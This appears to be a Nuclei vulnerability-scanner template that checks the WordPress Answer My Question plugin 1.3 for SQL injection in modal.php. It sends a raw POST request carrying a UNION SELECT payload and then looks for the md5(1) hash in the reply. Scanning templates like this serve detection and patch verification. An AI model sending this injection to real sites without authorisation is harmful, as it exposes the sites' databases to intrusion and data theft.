id: WordPress-modelPHP-sqli

info:
  name: WordPressd的Answer My Question插件1.3版本modal.php文件SQL注入
  author: Str1am
  severity: high
  tags: WordPress,sqli

requests:
  - raw:
      - |
        POST /wp-content/plugins/answer-my-question/modal.php HTTP/1.1
        Host: {{Hostname}}
        content-type: application/x-www-form-urlencoded

        id=0 UNION SELECT 1,2,3,4,5,6,md5(1),md5(1),md5(1),10,11,12 FROM wp_terms WHERE term_id=1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "c4ca4238a0b923820dcc509a6f75849b"
        part: body
        condition: and